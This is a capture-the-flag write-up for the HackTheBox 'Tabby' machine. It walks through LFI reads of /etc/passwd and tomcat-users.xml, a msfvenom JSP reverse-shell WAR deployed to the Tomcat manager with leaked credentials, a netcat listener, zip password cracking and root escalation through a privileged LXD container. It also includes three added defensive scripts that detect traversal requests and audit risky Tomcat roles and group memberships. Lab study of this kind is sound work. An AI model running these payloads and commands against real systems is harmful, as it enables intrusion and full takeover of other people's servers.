HackTheBox Tabby writeup

Tabby is an easy Linux machine from HackTheBox that is part of the pool of machines recommended as preparation for the OSCP certification.
Enumeration
Start with an nmap scan:
nmap -sC -sV 10.10.10.194
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 06:30 EDT
Nmap scan report for 10.10.10.194
Host is up (0.021s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Exploitation of Tomcat
The web application on port 80 is vulnerable to local file inclusion (LFI) through the file parameter of news.php, which exposes /etc/passwd:
view-source:http://10.10.10.194/news.php?file=../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
tomcat:x:997:997::/opt/tomcat:/bin/false
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ash:x:1000:1000:clive:/home/ash:/bin/bash
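The traversal request above leaves a clear trace in the web server's access log. The following detector is an added example for this writeup, not code from the original post: it parses Apache combined-format log lines, percent-decodes each query-string value repeatedly (so single- and double-encoded "../" are caught), and flags values containing traversal sequences or well-known sensitive paths. The log lines are constructed for the demo and include the writeup's own request; the log format and the list of sensitive paths are assumptions.

```python
"""Detect directory-traversal / LFI attempts in Apache access log lines.

Added example for the Tabby writeup, not part of the original post.
The sample log lines below are constructed; the first three requests
mirror the ones described in the writeup.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache combined log format: host ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Paths whose appearance in a parameter value is almost never legitimate (assumed list)
SENSITIVE = ("/etc/passwd", "/etc/shadow", "tomcat-users.xml", "/proc/self")


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so that %252e%252e%252f is seen as '../'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_params(target):
    """Return (param, decoded value) pairs that look like traversal or LFI."""
    parts = urlsplit(target)
    hits = []
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl already decodes one layer; decode_fully handles the rest
        value = decode_fully(raw).replace("\\", "/")
        if "../" in value or any(s in value for s in SENSITIVE):
            hits.append((name, value))
    return hits


def scan_log(lines):
    """Return one finding dict per request carrying a suspicious parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip
        hits = traversal_params(m["target"])
        if hits:
            findings.append({
                "ip": m["ip"], "time": m["time"], "status": int(m["status"]),
                "target": m["target"], "params": hits,
            })
    return findings


# Constructed sample: benign request, the writeup's request, a URL-encoded
# variant, a double-encoded variant, and an unrelated request.
SAMPLE_LOG = [
    '10.10.14.8 - - [10/Jul/2020:10:31:02 +0000] "GET /news.php?file=statement HTTP/1.1" 200 1234',
    '10.10.14.8 - - [10/Jul/2020:10:31:10 +0000] "GET /news.php?file=../../../../../etc/passwd HTTP/1.1" 200 2345',
    '10.10.14.8 - - [10/Jul/2020:10:31:15 +0000] "GET /news.php?file=..%2F..%2F..%2Fusr%2Fshare%2Ftomcat9%2Fetc%2Ftomcat-users.xml HTTP/1.1" 200 890',
    '10.10.14.8 - - [10/Jul/2020:10:31:20 +0000] "GET /news.php?file=%252e%252e%252fetc%252fshadow HTTP/1.1" 500 0',
    '10.10.14.9 - - [10/Jul/2020:10:32:00 +0000] "GET /index.php HTTP/1.1" 200 5000',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} status={f['status']} {f['params']}")
```

A 200 response on a flagged request is the signal that the inclusion actually succeeded; a 404 or 500 suggests the attempt failed but still identifies the probing client.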
It took a while to find the tomcat-users.xml file, as usually it's located at /usr/share/tomcat9/conf/tomcat-users.xml. In this case, the file can be read through the same LFI at view-source:http://10.10.10.194/news.php?file=../../../../../../usr/share/tomcat9/etc/tomcat-users.xml.
Content of the file:
<role rolename="admin-gui"/>
<role rolename="manager-script"/>
<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
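The manager-script role is what makes the WAR deployment below possible: it grants scripted access to the Tomcat Manager. The following audit script is an added example for this writeup, not Tomcat's or the original post's code. It parses a tomcat-users.xml, reports every user holding a role that allows deploying or administering web applications, and flags the role combination that Tomcat's documentation advises against (manager-gui together with manager-script or manager-jmx). The XML document is constructed from the roles shown above with placeholder passwords; the list of deployment-capable roles is an assumption based on the standard Manager and Host Manager roles.

```python
"""Audit tomcat-users.xml for accounts that can deploy code via the Manager app.

Added example for the Tabby writeup, not part of the original post.
The sample XML is constructed; it reuses the roles shown in the writeup
with placeholder passwords.
"""
import xml.etree.ElementTree as ET

# Roles that allow deploying or administering applications (Manager / Host Manager).
DEPLOY_ROLES = {"manager-gui", "manager-script", "manager-jmx", "admin-gui", "admin-script"}

# Combinations the Tomcat documentation recommends against for one user (CSRF risk).
BAD_COMBOS = [{"manager-gui", "manager-script"}, {"manager-gui", "manager-jmx"}]

SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <role rolename="manager-status"/>
  <user username="tomcat" password="PLACEHOLDER" roles="admin-gui,manager-script"/>
  <user username="reporter" password="PLACEHOLDER" roles="manager-status"/>
</tomcat-users>
"""


def _local(tag):
    """Strip the XML namespace prefix from an element tag."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return a list of findings, one per user/risk pair."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        if _local(el.tag) != "user":
            continue
        name = el.get("username")
        roles = {r.strip() for r in (el.get("roles") or "").split(",") if r.strip()}

        # Any deployment-capable role means this account can run code on the server.
        deploy = sorted(roles & DEPLOY_ROLES)
        if deploy:
            findings.append({"user": name, "severity": "high", "roles": deploy,
                             "reason": "can deploy or administer web applications"})

        # Combination explicitly discouraged by Tomcat's documentation.
        for combo in BAD_COMBOS:
            if combo <= roles:
                findings.append({"user": name, "severity": "combo", "roles": sorted(combo),
                                 "reason": "manager-gui combined with a script/jmx role"})
    return findings


if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE_XML):
        print(f"[{f['severity']}] {f['user']}: {f['reason']} ({', '.join(f['roles'])})")
```

Accounts reported with "high" severity should have a strong, unique password and, where the Manager is not needed from the network, the Manager application should be removed or restricted by IP.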
Creating a reverse shell payload as a WAR file:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.8 LPORT=53 -f war > shell.war
The port number can be anything. Here I'm just following the approach of asking "what if there were a firewall?" and not using something as sketchy as port 4444.
Uploading the reverse shell:
curl -u 'tomcat':'$3cureP4s5w0rd123!' -T shell.war 'http://10.10.10.194:8080/manager/text/deploy?path=/shell'
Starting a listener on port 53:
nc -nlvp 53
Triggering the shell:
curl -u 'tomcat':'$3cureP4s5w0rd123!' http://10.10.10.194:8080/shell/
Upgrading the shell to a full TTY:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color
CTRL+Z
stty raw -echo
fg
Privilege escalation with LXC containers
From /etc/passwd we know that the user ash exists on the system. Enumerating privilege escalation paths with linpeas.sh reveals the file 16162020_backup.zip in /var/www/html/files/.
Download it to the Kali instance and crack it with fcrackzip:
fcrackzip -D -p /usr/share/wordlists/rockyou.txt 16162020_backup.zip
The zip file contains the credentials ash:admin@it.
Switch user with the su command:
ash@tabby:~$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
What’s LXD?
LXD is a next generation system container manager. It offers a user experience similar to virtual machines but using Linux containers instead.
Building a custom container image:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo bash build-alpine
Upload the new image file to the machine and start the exploitation by importing it:
lxc image import ./alpine-v3.12-x86_64-20200710_0823.tar.gz --alias exploit
The imported images can be listed with:
lxc image list
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          | ARCHITECTURE |   TYPE    |  SIZE  |         UPLOAD DATE          |
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| exploit | 35186ff8d0a4 | no     | alpine v3.12 (20200710_08:23) | x86_64       | CONTAINER | 3.05MB | Jul 10, 2020 at 3:28pm (UTC) |
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
The image is now available. Next, create a container from it as a privileged one and mount the host's root filesystem into it as a disk device:
lxc init exploit honk -c security.privileged=true
lxc config device add honk roguedevice disk source=/ path=/mnt/root recursive=true
lxc start honk
lxc exec honk /bin/sh
As a result, you get a root shell inside the container, with the host's filesystem mounted at /mnt/root.
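The root cause of this escalation is not a bug in LXD but group membership: anyone in the lxd group can create privileged containers, which is equivalent to root on the host. The same is true of a few other groups. The following audit is an added example for this writeup, not part of the original post; it serves both the /etc/passwd leak earlier on the page and the id output above. It parses /etc/passwd and /etc/group, combines primary and supplementary group membership, and reports accounts with an interactive shell that belong to a root-equivalent group, plus any non-root account with uid 0. The passwd and group excerpts are constructed around the ash account and the groups shown in the writeup; the list of root-equivalent groups and the descriptions attached to them are assumptions.

```python
"""Audit /etc/passwd and /etc/group for accounts that are effectively root.

Added example for the Tabby writeup, not part of the original post.
The file contents below are constructed from the accounts and groups
shown in the writeup.
"""

# Groups whose membership is commonly treated as root-equivalent (assumed list).
ROOT_EQUIVALENT_GROUPS = {
    "lxd": "can create a privileged container with the host filesystem mounted",
    "docker": "can run a container with the host filesystem mounted",
    "disk": "can read and write raw block devices",
    "sudo": "can run commands as root (expected, but membership should be reviewed)",
    "adm": "can read system logs under /var/log",
}

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}

# Constructed excerpts reusing entries from the writeup.
PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
tomcat:x:997:997::/opt/tomcat:/bin/false
ash:x:1000:1000:clive:/home/ash:/bin/bash
"""

GROUP = """root:x:0:
adm:x:4:syslog,ash
sudo:x:27:
users:x:100:
lxd:x:116:ash
ash:x:1000:
"""


def parse_passwd(text):
    """Return {username: (uid, gid, home, shell)} from /etc/passwd content."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, home, shell = line.split(":", 6)
        users[name] = (int(uid), int(gid), home, shell)
    return users


def parse_group(text):
    """Return {groupname: (gid, set_of_members)} from /etc/group content."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups


def audit(passwd_text, group_text):
    """Return (user, reason) pairs for accounts with root-equivalent access."""
    users = parse_passwd(passwd_text)
    groups = parse_group(group_text)
    findings = []
    for name, (uid, gid, _home, shell) in users.items():
        if uid == 0 and name != "root":
            findings.append((name, "uid 0 account that is not root"))
        interactive = shell not in NOLOGIN_SHELLS
        # Effective groups: the primary group plus every supplementary membership.
        member_of = {g for g, (g_gid, members) in groups.items()
                     if name in members or g_gid == gid}
        for g in sorted(member_of & set(ROOT_EQUIVALENT_GROUPS)):
            if interactive:
                findings.append((name, f"interactive shell and member of '{g}': "
                                       f"{ROOT_EQUIVALENT_GROUPS[g]}"))
    return findings


if __name__ == "__main__":
    for user, reason in audit(PASSWD, GROUP):
        print(f"{user}: {reason}")
```

On the real box the script would be run as `audit(open('/etc/passwd').read(), open('/etc/group').read())`; removing ash from the lxd group (or restricting LXD to an administrator account) closes this escalation path.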